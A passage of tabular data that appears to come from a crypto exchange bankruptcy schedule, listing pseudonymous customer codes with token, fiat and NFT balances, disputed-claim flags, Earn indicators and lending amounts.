| 07409602 | | NFT (569550086471980794/Coachella x FTX Weekend 2 #3416)[1] | | |
| 07409611 | | BAT[1], BRZ[1], CUSDT[3], DOGE[5], TRX[1], USD[0.00], USDT[0.00000012] | | |
| 07409616 | | BTC[0], CUSDT[2], DOGE[1], ETH[0], LTC[0], USD[0.09] | Yes | |
| 07409623 | | CUSDT[1], DOGE[13.7421597], TRX[1], USD[1.23] | | |
| 07409628 | | BTC[.00001917] | | |
| 07409630 | | BTC[0], DOGE[.0161477], USD[0.00] | | |
| 07409633 | | USD[0.00], USDT[0] | | |
| 07409636 | | BTC[0.00002372], DOGE[11314.56], USD[3.36] | | |
| 07409637 | | TRX[178.284], USD[0.13] | | |
| 07409640 | | USD[3.03] | | |
| 07409643 | | DOGE[.483], SOL[.00153], USD[0.00], USDT[.4888707] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07409650 | | BAT[5.66282306], TRX[43.47539968], USD[0.00] | Yes | |
| 07409654 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07409655 | | ETH[.00009807], ETHW[.00009807], USD[0.01] | | |
| 07409656 | | BRZ[1], CUSDT[6], DOGE[1], ETH[0], ETHW[0], LTC[0], SOL[0], TRX[4], USD[0.00] | | |
| 07409674 | | USD[10.44] | | |
| 07409678 | | ETH[.105], ETHW[.105], USD[1.18] | | |
| 07409681 | | USD[482.00] | | |
| 07409684 | | USD[36.06] | | |
| 07409697 | | BTC[.00001602], USD[0.00], USDT[0] | Yes | |
| 07409709 | | AVAX[0], BTC[0], DOGE[0.00076456], ETH[0], ETHW[.00000001], MATIC[0.00000001], SHIB[0.00053484], SOL[0], TRX[.00003794], USD[2108.82], USDT[0.00002004] | | |
| 07409719 | | BAT[4], BRZ[2], CUSDT[5], DOGE[5], GRT[2], SOL[0], TRX[6], USD[0.00], USDT[3] | | |
| 07409728 | | BRZ[1], CUSDT[1], SOL[213.6928203], USD[0.00] | Yes | |
| 07409732 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07409736 | | ETH[0.01653000], ETHW[0.01653000], SOL[0], USD[4.54] | | |
| 07409747 | | SOL[0], USD[0.01] | | |
| 07409748 | | BTC[0], CUSDT[1], ETH[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.49] | Yes | |
| 07409749 | | CUSDT[1], USD[0.00] | Yes | |
| 07409750 | | DOGE[1], SOL[0] | | |
| 07409752 | | NFT (30345752717200405/Belgium Ticket Stub #126)[1], NFT (30369771116421972 6/The Hill by FTX #533)[1], NFT (30497057480889817 0/FTX - Off The Grid Miami #693)[1], NFT (33291030633165391 0/Austria Ticket Stub #35)[1], NFT (38826730813638164 3/Series 1: Capitals #414)[1], NFT (40746719658132443 9/Humpty Dumpty #640)[1], NFT (43947844951777674 7/Barcelona Ticket Stub #1528)[1], NFT (43982474838162075 9/Series 1: Wizards #384)[1], NFT (44654707343134654 9/Baku Ticket Stub #245)[1], NFT (45609984667870784 0/Australia Ticket Stub #2454)[1], NFT (45973449195184899 8/Hungary Ticket Stub #86)[1], NFT (48941958149614169 5/Silverstone Ticket Stub #88)[1], NFT (51320382018102934 9/France Ticket Stub #59)[1], NFT (51576591439261758 5/Entrance Voucher #1462)[1], NFT (53257091484910193 7/FTX Crypto Cup 2022 Key #53)[1], NFT (54065659726078145 3/Juliet #345)[1], NFT (56144585429138002 4/Montreal Ticket Stub #72)[1], USD[0.00] | Yes | |
| 07409753 | | BTC[.00709649], TRX[1], USD[0.00] | | |
| 07409756 | | NFT (318066821353865836/FTX - Off The Grid Miami #1041)[1], SOL[0], USD[0.00], USDT[0.00000008] | | |
| 07409764 | | BAT[0], BTC[0], DOGE[6409.54320585], ETH[0], SHIB[2], SOL[0], USD[0.00], USDT[0] | | |
| 07409773 | | DOGE[1500.98331488], SOL[128.65578088], TRX[1], USD[434.94], USDT[1.08736122] | Yes | |
| 07409777 | | DOGE[.68], ETH[.0049588 5], ETHW[.0049588 5], USD[0.87] | | |
| 07409780 | | BRZ[5], CUSDT[2], DOGE[28.09425039], ETH[0], LINK[0], SHIB[5], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07409781 | | DOGE[140.436], SUSHI[98.604], USD[0.05] | | |
| 07409787 | | BCH[0], BRZ[1], BTC[0.10930922], CUSDT[5], ETH[0], GRT[1], SHIB[1], SOL[0], TRX[3], USD[0.00], USDT[1.02543197] | Yes | |
| 07409793 | | BCH[0], LINK[.0044], USDT[0.99063192] | | |
| 07409795 | | USD[0.00], USDT[0] | | |
| 07409802 | Contingent, Disputed | SOL[0], USD[0.87] | | |
| 07409803 | | BAT[3.16949549], BF_POINT[200], BRZ[2], BTC[0.00001189], CUSDT[1], DOGE[4], ETH[0], GRT[1], SOL[0], TRX[3], UNI[1.0676593], USD[0.00] | Yes | |
| 07409804 | | DOGE[.09123019], TRX[2], USD[0.00] | | |
| 07409806 | | TRX[1], USD[0.00] | | |
| 07409807 | | BRZ[1], BTC[.00126385], USD[141.66] | | |
| 07409811 | | BTC[0], SOL[9.9905], USD[0.00] | | |
| 07409814 | | USD[1.01] | | |
| 07409820 | | USD[5.92] | | |
| 07409823 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0.49721104], UNI[0], USD[0.00], YFI[0] | | |
| 07409837 | | BCH[.42887946], DOGE[.37132581], LINK[14.28704], MATIC[8.77], SOL[36.48404], SUSHI[378.215], USD[6.39], USDT[0] | | |
| 07409838 | | BAT[0], BCH[0.00000003], BTC[0.00011791], DOGE[0.00000003], ETH[0.00000001], KSHIB[0], LINK[0], LTC[0], TRX[0.00000001], USD[0.00], USDT[0.00000098] | | |
| 07409839 | | USD[0.00] | | |
| 07409841 | | GRT[0], SOL[0], USDT[0] | | |
| 07409853 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07409854 | | BTC[.0026949], DOGE[1306.3706588], LINK[.996], LTC[.12948], SHIB[2000000], TRX[1748.698], USD[1.81] | | |
| 07409857 | | CUSDT[3], EUR[0.00], MKR[0], SHIB[10], SOL[0], TRX[2], USD[1.44] | Yes | |
| 07409871 | | BTC[0.00009140], DOGE[.645], ETH[.0008526], ETHW[.0008526], SOL[.00759662], USD[0.19] | | |
| 07409872 | | SUSHI[8.99145], USD[4.13] | | |
| 07409875 | | USD[0.04] | | |
| 07409881 | | BTC[.00007298], SOL[3.06882244], USD[0.00] | | |
| 07409882 | | DOGE[.28], USD[0.22] | | |
| 07409884 | | SOL[0], USD[0.00], USDT[0.00000092] | | |
| 07409888 | | LTC[.06], SOL[.371951], USD[0.00] | | |
| 07409904 | | SOL[31.07524758], USD[0.00], USDT[0.00000011] | | |
| 07409905 | | BTC[0.00012200], SOL[.079], USD[17.64] | | |
| 07409907 | | USD[0.96] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07409913 | | DOGE[87.24814296], USD[0.00] | | |
| 07409921 | | LTC[0], SOL[0], USD[0.00] | | |
| 07409925 | | BRZ[1], GRT[1], TRX[1], USD[0.01] | | |
| 07409928 | | USD[4.79] | | |
| 07409937 | | DOGE[.1], USD[0.33] | | |
| 07409940 | | SOL[139.405845], USD[13.85] | | |
| 07409945 | | DOGE[2999], SOL[0], USD[1.16] | | |
| 07409948 | | AAVE[.00269], BAT[0], BTC[0], GRT[0], LINK[0.02608466], MATIC[5.63000000], MKR[0], SOL[0.00670734], SUSHI[.008], USD[0.01] | | |
| 07409949 | | BTC[.00248465], ETH[0.01998699], ETHW[0.01998699], SOL[2.11417557] | | |
| 07409951 | | DOGE[2224.68881135], USD[0.00], USDT[1.10438335] | Yes | |
| 07409952 | | CUSDT[1], DOGE[1097.30374942], MATIC[23.44679345], USD[0.00], USDT[0] | Yes | |
| 07409953 | | BTC[0.00003932], DOGE[.45787984], ETHW[.02467], TRX[.00001], USD[4.81], USDT[18.32892756] | | |
| 07409954 | | USD[0.01] | | |
| 07409956 | | SOL[253.55551799], USD[0.00] | | |
| 07409957 | | BTC[0.00176683], SUSHI[.00000001], USD[6.27] | | |
| 07409968 | | DOGE[0], ETH[0], TRX[0], USD[0.07] | | |
| 07409969 | | AAVE[0.19238577], BAT[7.88164971], BCH[0.47582457], BRZ[1], BTC[.01879244], CUSDT[19], DOGE[7698.44850891], ETH[0.69388051], ETHW[0.69358269], LTC[.65366247], SHIB[2120660.92763654], SOL[8.16596081], TRX[185.2771101], UNI[0], USD[0.00], YFI[.00143982] | Yes | |
| 07409970 | | BAT[2.01419458], BRZ[2], BTC[0], CUSDT[4], DOGE[0], GRT[1.00016192], SHIB[0], SOL[1.09571033], TRX[5], USD[10017.66], USDT[2.17246132] | | |
| 07409971 | | BTC[.00002876], SUSHI[.996], USD[0.01] | | |
| 07409977 | | BF_POINT[200], NFT [392645653184927190/Entrance Voucher #1720][1] | Yes | |
| 07409978 | | DOGE[1], GRT[11.62412933], USD[0.00] | | |
| 07409981 | | ETH[.00000001], NFT [288886447298391995/Australia Ticket Stub #830][1], USD[0.47] | Yes | |
| 07409984 | | CUSDT[1], DOGE[445.95257983], USD[0.00] | Yes | |
| 07409985 | | BTC[.02] | | |
| 07409988 | | SOL[.13537887], TRX[1], USD[0.00] | Yes | |
| 07409989 | | BAT[1], BRZ[1], CUSDT[5], DOGE[3], SHIB[7], TRX[2], USD[302.72] | | |
| 07409992 | | SOL[11.64695347] | | |
| 07409993 | | USD[10.00] | | |
| 07409997 | | BAT[.202], BCH[.000604], BTC[.0000048], ETH[.000877], ETHW[.000877], GRT[.4], LINK[.0911], LTC[.00469], SUSHI[.456], UNI[.0731], USD[0.06], USDT[0] | | |
| 07409998 | | CUSDT[1], DOGE[2], GRT[1], SOL[201.27462607], SUSHI[1], TRX[5], UNI[2], USD[51979.69], USDT[2] | | |
| 07409999 | | USDT[0.00000013] | | |
| 07410002 | | NFT [297691367408037212/Bahrain Ticket Stub #293][1], NFT [330821449906966913/GSW Western Conference Semifinals Commemorative Ticket #709][1], NFT [394043464687022777/GSW 75 Anniversary Diamond #343][1], NFT [400834669363610334/GSW Western Conference Finals Commemorative Banner #1354][1], NFT [408453134420380522/GSW Championship Commemorative Ring][1], NFT [557608073466385041/GSW Western Conference Finals Commemorative Banner #1353][1], USD[0.00] | | |
| 07410003 | | BAT[21.66809473], BTC[0.00087833], DOGE[367.61881767], ETH[0.01649928], ETHW[0.01649928], SHIB[4], SUSHI[0], TRX[1], USD[0.01], USDT[0] | | |
| 07410005 | | CUSDT[1], DOGE[363.77528611], USD[0.00] | | |
| 07410008 | | ETH[.00000001], LINK[13.3866], USD[0.00], USDT[1.3744298] | | |
| 07410010 | | BRZ[1], USD[0.00] | | |
| 07410013 | | NFT [326065856209951682/Humpty Dumpty #1536][1] | | |
| 07410014 | | LTC[.00979221], TRX[.000007], USDT[7.675316] | | |
| 07410017 | | DOGE[.752], LTC[.02988], SOL[2.2908], USD[3.19] | | |
| 07410027 | | BRZ[4], DOGE[3], NFT [308402252137181771/Imola Ticket Stub #1756][1], NFT [462074102218391482/Barcelona Ticket Stub #2146][1], NFT [493540841723209147/Red Moon #94][1], SHIB[34], TRX[4.000066], USD[0.00], USDT[0] | Yes | |
| 07410029 | | BTC[0], DOGE[41.65600000], SOL[0.00371000], USD[0.81] | | |
| 07410031 | | SOL[13.71488851], SUSHI[0], USD[16.00] | | |
| 07410033 | | BF_POINT[300], ETH[0], USD[0.20] | | |
| 07410035 | | SOL[.000315], USD[214.86] | | |
| 07410038 | | AAVE[0], ALGO[0], AVAX[0], BAT[0], BCH[0], BRZ[1], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[13.45674527], MATIC[0.00083042], MKR[0], NEAR[0], PAXG[0], SHIB[1], SOL[0], TRX[1], USD[0.00], USDT[0], WBTC[0] | Yes | |
| 07410040 | | AVAX[1.5999], USD[38.45] | | |
| 07410041 | | BAT[1.01655549], BRZ[2], CUSDT[2], GRT[2.08540751], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07410042 | | AVAX[223.50034017], BTC[0.00426931], ETH[30.41324727], ETHW[30.11640711], PAXG[0.00049247], SOL[160.98648387], USD[49776.70] | | AVAX[223.428927], BTC[.004268], ETH[30.412821], PAXG[.000492], SOL[160.935045], USD[721.61] |
| 07410046 | | CUSDT[2], DOGE[4], TRX[1.08517945], USD[0.00] | | |
| 07410050 | | SHIB[2], USD[0.00] | Yes | |
| 07410052 | | AAVE[0], BAT[2.0165555], BRZ[3], CUSDT[3], DOGE[4.000548], ETH[0], ETHW[0], SHIB[2], SOL[0], TRX[8], USD[0.01], USDT[1.10767618] | Yes | |
| 07410054 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07410056 | | USD[7.44] | | |
| 07410059 | | BTC[0], NFT [334401468547690984/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #34][1], NFT [368732703001295344/Humpty Dumpty #239][1], NFT [543925575285196626/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #38][1], NFT [566697229673006727/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #30][1], SOL[3.03218], USD[40.12], USDT[0] | | |
| 07410060 | | GRT[.556], USD[1.16] | | |
| 07410080 | | CUSDT[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07410091 | | CUSDT[1], DOGE[190.95418728], USD[0.00] | | |
| 07410092 | | SOL[130.662], USD[0.00], USDT[0.00000001] | | |
| 07410093 | | SOL[.098], TRX[.000006], USD[0.00], USDT[0.00848200] | | |
| 07410098 | | SOL[13.2468], USD[4.63] | | |
| 07410099 | | BTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07410103 | | SOL[0], SUSHI[0] | | |
| 07410109 | | BRZ[1], DOGE[1], USD[0.00] | Yes | |
| 07410110 | | BAT[2], CUSDT[1], DOGE[63503.0680808], TRX[15466.52704813], UNI[1], USD[0.00], USDT[1] | | |
| 07410111 | | CUSDT[142.38463518], DOGE[10.73635504], SOL[24.08261488], TRX[1], USD[0.01] | | |
| 07410115 | | SOL[.0148], USD[0.91] | | |
| 07410117 | | BRZ[1.01115341], CUSDT[.02226875], DOGE[6343.26692744], SHIB[4619761.88136569], TRX[3], USD[0.24] | Yes | |
| 07410127 | | CUSDT[2], LINK[8.59779159], SOL[11.44190716], TRX[1], USD[500.00] | | |
| 07410132 | | BRZ[1], USD[0.00] | Yes | |
| 07410135 | | BAT[0], BCH[0], BRZ[0], BTC[0.00063088], CUSDT[1], DOGE[1], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[2], UNI[0], USD[0.00], USDT[0.00001259] | | |
| 07410141 | | LINK[.01011081], SOL[.00000001], TRX[0], USD[0.01], USDT[0] | | |
| 07410143 | | NFT (398711235806965518/Coachella x FTX Weekend 2 #3680)[1] | | |
| 07410145 | | NFT (575856021366609977/Bull #433)[1] | | |
| 07410146 | | CUSDT[1], TRX[.02891402], USD[0.00], USDT[0] | Yes | |
| 07410147 | | SOL[215.5542], USD[0.60] | | |
| 07410149 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.48], USDT[0.00000152] | | |
| 07410152 | | BRZ[1], BTC[.16208902], DOGE[1], USD[0.00] | | |
| 07410153 | | TRX[.000001], USD[1.13] | | |
| 07410156 | | BTC[.02825132], CUSDT[2], DOGE[2], ETHW[.22173737], SHIB[1], SOL[2.2312636], USD[0.00] | Yes | |
| 07410157 | | ETH[.010989], ETHW[.010989], USD[0.00], USDT[2.59750000] | | |
| 07410158 | | USD[0.04] | | |
| 07410159 | | CUSDT[1], SOL[254.42044976], TRX[2], USD[0.00] | Yes | |
| 07410160 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07410163 | | SHIB[1], USD[117.30] | | |
| 07410165 | | USD[0.01] | | |
| 07410169 | | ETH[0], SOL[0] | | |
| 07410172 | | BAT[3.25820431], BRZ[2], CUSDT[5], DOGE[4], ETH[.00001181], ETHW[.00001181], SOL[106.66286707], TRX[5], USD[0.85] | Yes | |
| 07410173 | | BTC[.00196211], USD[0.00] | | |
| 07410174 | | BAT[1.0165555], BRZ[1], CUSDT[2], LTC[1.31416646], TRX[3], USD[0.00] | Yes | |
| 07410175 | | NFT (329535010273307749/Reflection '18 #36 (Redeemed))[1], NFT (388305852285725173/Ferris From Afar #223 (Redeemed))[1], NFT (414351302669275170/Reflector #440)[1], NFT (517391338771723079/Vintage Sahara #739)[1], USD[1.00] | | |
| 07410179 | | SOL[0], USDT[0.00000030] | | |
| 07410183 | | BTC[.00006824], ETH[.00000001], USD[0.00], USDT[0] | | |
| 07410187 | | BRZ[.00019978], BTC[0], ETH[0], GRT[0], LINK[.00001903], MATIC[0], SHIB[4], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07410191 | | SOL[.8176], USD[0.00] | | |
| 07410192 | | CUSDT[4], LINK[.03614669], USD[0.00] | | |
| 07410193 | | BTC[0.00007471], DOGE[0.76247490], ETH[0], ETHW[0], LTC[0], MATIC[.06293023], NEAR[.00032654], SOL[0.00024074], SUSHI[0], USD[0.28] | Yes | |
| 07410197 | | SOL[0], USD[0.00] | | |
| 07410201 | | TRX[.000002], USD[0.77], USDT[35.06589267] | | |
| 07410202 | | DOGE[1], USD[0.55] | | |
| 07410208 | | DOGE[1], LTC[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07410210 | | DOGE[4], LTC[0], UNI[0], USD[0.00] | | |
| 07410213 | | USD[0.01] | | |
| 07410214 | | DOGE[25.896], USD[0.00] | | |
| 07410216 | | NFT (454989109678477955/FTX Cap)[1], USD[3.66], USDT[0] | | |
| 07410219 | | USD[0.85] | | |
| 07410220 | | BTC[0], USD[0.13] | Yes | |
| 07410222 | | DOGE[414.5836954], USD[0.00] | | |
| 07410229 | | BRZ[1], CUSDT[10], DOGE[1], USD[0.55] | | |
| 07410230 | | SOL[.00000001], USD[0.13] | | |
| 07410232 | | DOGE[1], USD[0.00] | | |
| 07410234 | | USD[0.39] | | |
| 07410237 | | BTC[0], ETH[0], ETHW[0], SOL[8.23116374], USD[0.00], USDT[0.00000013] | | |
| 07410238 | | BTC[0], GRT[0], TRX[0], USDT[0] | | |
| 07410244 | | BAT[221.38418167], BTC[.00560594], CUSDT[1], ETH[.02267483], ETHW[.02239041], KSHIB[1920.51875086], LTC[.47516938], SHIB[6726660.00214499] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07410246 | | BAT[2.07444541], BRZ[1], CUSDT[9], DOGE[4], GRT[1], NFT (353286977196743175/SBF Hair & Signature #1 #48)[1], NFT (392585919275738145/SBF Hair & Signature #2 #45)[1], NFT (401994305951337327/SBF Hair & Signature #4 #38)[1], NFT (411382022763511260/SBF Hair & Signature #3 #39)[1], NFT (416408597915493258/SBF Hair & Signature #7 #23)[1], SHIB[19], SOL[6.66793512], SUSHI[0], TRX[12], UNI[0], USD[0.00], USDT[2.14512996] | Yes | |
| 07410249 | | USD[0.94], USDT[0] | | |
| 07410252 | | BAT[.01534004], BCH[.00021564], BTC[.00000552], CUSDT[16], LINK[.00009401], MATIC[.08159411], SHIB[8648.0126984], SUSHI[.00199912], UNI[.0048601], USD[0.00], USDT[0], YFI[.00004199] | Yes | |
| 07410255 | | BTC[0], ETH[0], SOL[0], SUSHI[.00000001], TRX[0], USD[0.00], USDT[0.00000036] | Yes | |
| 07410256 | | BAT[.00001835], BRZ[1], BTC[.00000687], CUSDT[1], SOL[0], TRX[3], USD[0.00], USDT[0.00000607] | | |
| 07410260 | | BRZ[1], CUSDT[6], DOGE[2166.97171657], SHIB[4961261.05310888], TRX[2], USD[0.00] | | |
| 07410261 | | BAT[1], BRZ[1], CUSDT[2], DOGE[3], NFT (387516645053035632/GSW Western Conference Finals Commemorative Banner #1061)[1], NFT (433345437939901460/GSW Western Conference Finals Commemorative Banner #1063)[1], NFT (467702005020246297/GSW Western Conference Finals Commemorative Banner #1062)[1], NFT (502319600162674651/GSW Western Conference Finals Commemorative Banner #1064)[1], SOL[0], TRX[3], USD[0.00], USDT[1.05098382] | Yes | |
| 07410264 | | BCH[0], BRZ[0], BTC[0], CUSDT[11.07024657], DAI[0], DOGE[0], GRT[0], PAXG[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07410265 | | DOGE[1250] | | |
| 07410281 | | CUSDT[1], DOGE[2086.32314691], USD[0.00] | | |
| 07410283 | | SOL[0], USD[1.12] | | |
| 07410284 | | BRZ[1], CUSDT[5], DOGE[3], ETH[.52741604], GRT[1.00434334], MATIC[53.66378718], SHIB[1474856.2806793], SOL[64.52949106], SUSHI[3.06757176], TRX[3], USD[0.92], USDT[107.85346371] | Yes | |
| 07410286 | | BTC[0], ETH[.00000001], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07410293 | | BAT[1], BTC[0], CUSDT[3], DOGE[15], TRX[2], USD[0.00] | | |
| 07410301 | | SOL[1.28815824], USD[0.00] | | |
| 07410303 | | BRZ[1], BTC[.01497071], CUSDT[114.11549481], DOGE[2624.15208609], ETH[.09136971], ETHW[.09031998], LINK[1.75131278], LTC[.24126899], MATIC[28.07736716], SHIB[2870396.1516229], SOL[.50036472], SUSHI[10.97841973], TRX[922.79775546], USD[10.25], USDT[.99438061] | Yes | |
| 07410306 | | DOGE[29.4], USD[0.96], USDT[0] | | |
| 07410311 | | BAT[1], BTC[.00876977], CUSDT[1], DOGE[1137.32296155], SOL[34.59588461], USD[500.00] | | |
| 07410315 | | BTC[0.00346625], SHIB[19], SOL[.00000001], USD[0.00], USDT[0.00014979] | Yes | |
| 07410316 | | CUSDT[14], LINK[.00000974], SHIB[9.81257973], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07410317 | | DOGE[353.60396263], USD[0.00] | | |
| 07410319 | | USD[0.00] | | |
| 07410323 | | BTC[0], DOGE[92.00585], ETH[.0004165], ETHW[.0004165], LINK[0], USD[23.87], USDT[0.00000187] | | |
| 07410324 | | BCH[.23744634], BRZ[3], CUSDT[6], DOGE[1181.79527587], ETH[.01491471], ETHW[.01491471], LINK[.00002097], SOL[.09995519], TRX[3], USD[0.00] | | |
| 07410331 | | CUSDT[1], DOGE[60.90990579], USD[0.00] | | |
| 07410337 | | SOL[.1575572] | | |
| 07410342 | | BTC[0], ETH[0], ETHW[2.38820918], USD[6430.04] | | |
| 07410343 | | CHF[0.00], ETH[0], USD[0.06], USDT[0] | Yes | |
| 07410344 | | CUSDT[141.82747538], USD[2.00] | | |
| 07410347 | | DOGE[1], ETH[.12249512], ETHW[.12249512], SOL[7.98232345], TRX[1], USD[0.00] | | |
| 07410352 | | DOGE[0], SOL[3.42000000], USD[0.00] | | |
| 07410354 | | BRZ[3], CUSDT[5], GRT[2], TRX[4], UNI[.26973605], USD[0.00] | | |
| 07410358 | | BRZ[1], CUSDT[4], DOGE[6], USD[0.00] | | |
| 07410361 | | BTC[.00006021], SOL[8.991] | | |
| 07410369 | | SOL[0], USD[0.00] | | |
| 07410370 | | USD[21.10] | | |
| 07410375 | | BTC[.00000001], CUSDT[5], DOGE[1], ETH[.00518359], ETHW[.00511519], TRX[2], USD[0.01], USDT[5.44895774] | Yes | |
| 07410377 | | BTC[.00094224], SOL[0], USD[0.00], USDT[0] | | |
| 07410381 | | DOGE[1], USD[0.00], USDT[0] | Yes | |
| 07410383 | | SOL[.094], USD[207.29] | | |
| 07410385 | | USD[185.00], USDT[.3020649] | | |
| 07410391 | | BRZ[1], BTC[.15693884], CUSDT[3], DOGE[982.66531912], ETH[0.66836480], ETHW[0.66808420], GRT[1], LINK[1.08484641], SOL[103.19531976], TRX[3], USD[0.00], USDT[1.08484641] | Yes | |
| 07410392 | | BRZ[1], CUSDT[5], TRX[4], USD[0.00] | | |
| 07410393 | | USD[3.77] | | |
| 07410399 | | BRZ[1], BTC[.02151757], DOGE[4], ETH[.23286404], ETHW[.23286404], SUSHI[23.35884207], TRX[1], USD[0.00] | | |
| 07410404 | | SOL[0] | | |
| 07410406 | | BRZ[0.00000067], CUSDT[1], NFT (530677047676432159/Saudi Arabia Ticket Stub #158)[1], USD[0.10] | Yes | |
| 07410407 | | BTC[.00033134], DOGE[1], SHIB[1], USD[0.00] | | |
| 07410416 | | BTC[0], DOGE[8.84893317], SOL[0], USD[0.00] | Yes | |
| 07410419 | | BTC[0], ETH[0.00000513], ETHW[0.00000513], USD[0.00] | | |
| 07410424 | | SOL[0], USD[1.46] | | |
| 07410425 | | CUSDT[1], DOGE[909.69985913], USD[1925.28] | | |
| 07410426 | | BTC[0.00000501], TRX[.000002], USD[0.00], USDT[0.00000001] | | |
| 07410427 | | USD[1000.00] | | |
| 07410430 | | SOL[0], USD[0.00], USDT[0] | | |
| 07410436 | | ETHW[.32785521], USD[3014.05] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07410439 | | USD[0.00] | | |
| 07410440 | | USD[0.01] | | |
| 07410444 | | BCH[.06145349], BRZ[1], CUSDT[177.22769805], DOGE[77.06424272], SHIB[1528166.49528795], SOL[.0967076], TRX[108.54544359], USD[0.00] | Yes | |
| 07410445 | | USD[0.00] | | |
| 07410447 | | BTC[0], USD[1758.92] | | |
| 07410453 | | USD[0.58] | | |
| 07410456 | | BAT[3.25735758], BCH[0], BRZ[1], BTC[0], CUSDT[2], DOGE[3], ETH[0], GRT[1.00498957], SOL[0], TRX[7], USD[0.02], USDT[1.09870971] | Yes | |
| 07410457 | | CUSDT[2], DOGE[230.68826203], USD[0.00] | | |
| 07410458 | | BAT[0], BTC[0], DOGE[0], ETH[.00000001], ETHW[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07410459 | | ETHW[299], TRX[0], USD[0.00], USDT[0] | | |
| 07410461 | | USD[0.00] | | |
| 07410473 | | USD[0.00] | | |
| 07410474 | | DOGE[2187.89062845], USD[0.00] | | |
| 07410476 | | DOGE[1], USD[1.72] | | |
| 07410479 | | LTC[0], TRX[0] | | |
| 07410484 | | BAT[0], DOGE[0], LINK[0], LTC[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07410487 | | BRZ[1], USD[0.01] | Yes | |
| 07410490 | | BTC[0], ETH[0], NFT (400335127873306619/Plaid #1)[1], SOL[2.20000000], USD[0.00], USDT[0] | | |
| 07410496 | | SOL[285.852], USD[23.88] | | |
| 07410497 | | SOL[0.20799523], USD[0.00] | Yes | |
| 07410500 | | BAT[13.46], BTC[0.00351228], DOGE[4925.063], ETH[.013011], ETHW[.013011], LINK[.5648], LTC[.00591], SOL[30.0659], SUSHI[.498], TRX[575.883], UNI[.1972], USD[139.47] | | |
| 07410502 | | CUSDT[8], TRX[1], USD[0.00], USDT[1] | | |
| 07410509 | | CUSDT[2], NFT (326248719504149243/Entrance Voucher #2422)[1], USD[0.00] | | |
| 07410511 | | BRZ[1], CUSDT[2], DOGE[2], GRT[1.00283507], NFT (397066381459416633/Coachella x FTX Weekend 2 #28093)[1], SHIB[2], SOL[18.61137175], TRX[1], USD[0.00] | Yes | |
| 07410512 | | SOL[33.864], USDT[13.19] | | |
| 07410513 | | SOL[0], USD[0.00] | | |
| 07410514 | | BAT[2.09403657], BRZ[5.06474952], BTC[.04262958], DOGE[72093.51053216], ETH[1.58167651], ETHW[1.58101219], GRT[1.00351994], LTC[2.0317283], SOL[93.34354339], SUSHI[22.62151187], TRX[3], UNI[1.08795277], USD[47], USDT[1.08758882] | Yes | |
| 07410515 | | CUSDT[1], DOGE[1], GRT[161.09689904], SOL[.30325507], USD[2.07] | Yes | |
| 07410522 | | BTC[0.16851264], DOGE[0], LTC[1.867491], SHIB[20979000], SOL[32.64129], SUSHI[85.4145], USD[0.74], USDT[0] | | |
| 07410525 | | USD[90.00] | | |
| 07410528 | | USD[1.19] | | |
| 07410530 | | USD[110.14] | Yes | |
| 07410533 | | DOGE[1], TRX[0] | | |
| 07410534 | | BRZ[1], CUSDT[6], DOGE[123.9573555], TRX[875.93281899], USD[5.32] | | |
| 07410537 | | ETH[2.45556218], ETHW[2.45556218], SOL[54.95987535], TRX[0], USD[0.00] | | |
| 07410540 | Contingent, Disputed | BRZ[2], CUSDT[3], DOGE[2003.56017945], GRT[1], SOL[399.87345918], TRX[2], USD[702.00], USDT[1] | | |
| 07410541 | | BTC[.05587757], CUSDT[1], DOGE[8819.26377641], ETH[.0981187], ETHW[.0981187], MATIC[95.84252566], SHIB[4], SOL[4.71664311], TRX[1], USD[0.00], USDT[1] | | |
| 07410545 | | SOL[1.1988], USD[2.00] | | |
| 07410547 | | SOL[17.59543235], TRX[1], USD[0.00] | | |
| 07410549 | | SOL[0.00189294], TRX[0], USD[0.00], USDT[0] | | |
| 07410552 | | CUSDT[2], MATIC[0], USD[0.00] | | |
| 07410555 | | USD[0.00] | | |
| 07410559 | | SOL[.005], USD[29.84] | | |
